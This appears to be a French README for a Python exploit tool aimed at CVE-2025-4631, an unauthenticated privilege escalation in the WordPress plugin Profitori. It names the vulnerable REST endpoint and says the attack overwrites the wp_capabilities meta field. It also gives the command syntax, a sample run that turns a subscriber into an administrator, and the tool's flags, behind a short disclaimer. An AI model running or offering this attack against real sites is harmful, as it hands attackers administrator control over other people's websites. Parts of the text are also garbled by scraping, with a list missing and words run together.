
Profitori 2.0.6.0 - 2.1.1.3 - Absence d'autorisation menant à une escalade de privilèges non authentifiée
Le plugin Profitori (versions 2.0.6.0 à 2.1.1.3) est vulnérable à une élévation de privilèges non authentifiée en raison d'un contrôle de capacité manquant dans le point de terminaison /wp-json/stocktend/v1/stocktend_object. Cela permet à des attaquants distants d'élever les privilèges d'utilisateurs existants (ou d'en créer de nouveaux) en manipulant directement le champ méta wp_capabilities.
Cet exploit Python automatise le processus d'élévation de privilèges en :
readme.txt.Si la vérification de version échoue, l'exploit se poursuit prudemment avec un avertissement.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Vérification de la version du plugin sur : http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Version vulnérable détectée : 2.1.1.3
[🚀] Exploitation dans 3 secondes...
[📡] Envoi de la requête d'élévation de privilèges vers : http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit terminé avec succès !
[🧾] Informations utilisateur mises à jour :
--------------------------------------
🆔 ID utilisateur : 3
👤 Nom d'utilisateur : subscriber
📧 Email : [email protected]
🪪 Nom d'affichage : Subscriber User
🔗 URL utilisateur :
🛡 Rôle brut : a:1:{s:13:"administrator";b:1;}
[👑] Exploit par : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requestsInstallation via :
pip install requests
Cet outil est fourni à des fins éducatives et de tests autorisés uniquement. Toute utilisation abusive de cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est strictement interdite. Le créateur décline toute responsabilité en cas de dommages ou de conséquences juridiques découlant d'une utilisation inappropriée.
Par : Nxploited ( Khaled_Alenazi )
| Flag | Description | Requis |
|---|
-u, --url | 🌐 URL de base du site WordPress | ✅ Oui |
-id | 🆔 ID de l'utilisateur à élever | ✅ Oui |
--email | 📧 Email fictif à afficher | ❌ Non |
--name | 👤 Nom d'affichage | ❌ Non |
--url_field | 🔗 Champ URL utilisateur | ❌ Non |
--verbose | 🔍 Afficher la réponse JSON complète | ❌ Non |